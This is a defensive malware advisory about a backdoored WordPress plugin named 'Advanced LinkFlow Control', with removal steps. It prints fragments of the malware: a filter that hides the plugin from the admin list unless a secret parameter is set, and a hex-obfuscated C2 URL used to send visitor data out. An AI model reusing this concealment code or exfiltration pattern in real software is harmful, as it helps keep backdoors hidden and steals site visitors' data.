Malware advisory · High severity
Advanced LinkFlow Control
If you discovered the "Advanced LinkFlow Control" plugin in your WordPress files, your site is infected with a stealth backdoor. This malware hides itself from the admin dashboard, clears cache plugins to persist, and secretly exfiltrates visitor data to a remote server. You must delete the advanced-linkflow-control folder immediately.
Behavior and purpose
Disguises itself as a utility plugin, hides from the WordPress admin list, and acts as a backdoor to exfiltrate visitor data (IPs, User Agents). It also clears caching plugins to persist injected SEO spam and cloaks content from search engines.
Defensive removal notes
- Access your server’s file system via FTP or File Manager.
- Navigate to `wp-content/plugins/`.
- Locate and completely delete the `advanced-linkflow-control` folder to eliminate the backdoor.
- Verify the removal by ensuring no related active processes remain and checking your `wp-options` for any leftover transients.
Observed code indicator
Treat this as an investigation clue, not proof by itself.
add_filter('all_plugins', function ($plugins) {
if (isset($_GET['sp'])) {
return $plugins;
}
$current = plugin_basename(__FILE__);
unset($plugins[$current]);
return $plugins;
});
// Decoded C2 Server
private $server_url = "\x68\x74\x74\x70:\x2f/\x77h\x74a\x73f\x64e\x2ei\x63u\x2fg\x65t\x2ep\x68p"; // http://whatsdf.icu/get.php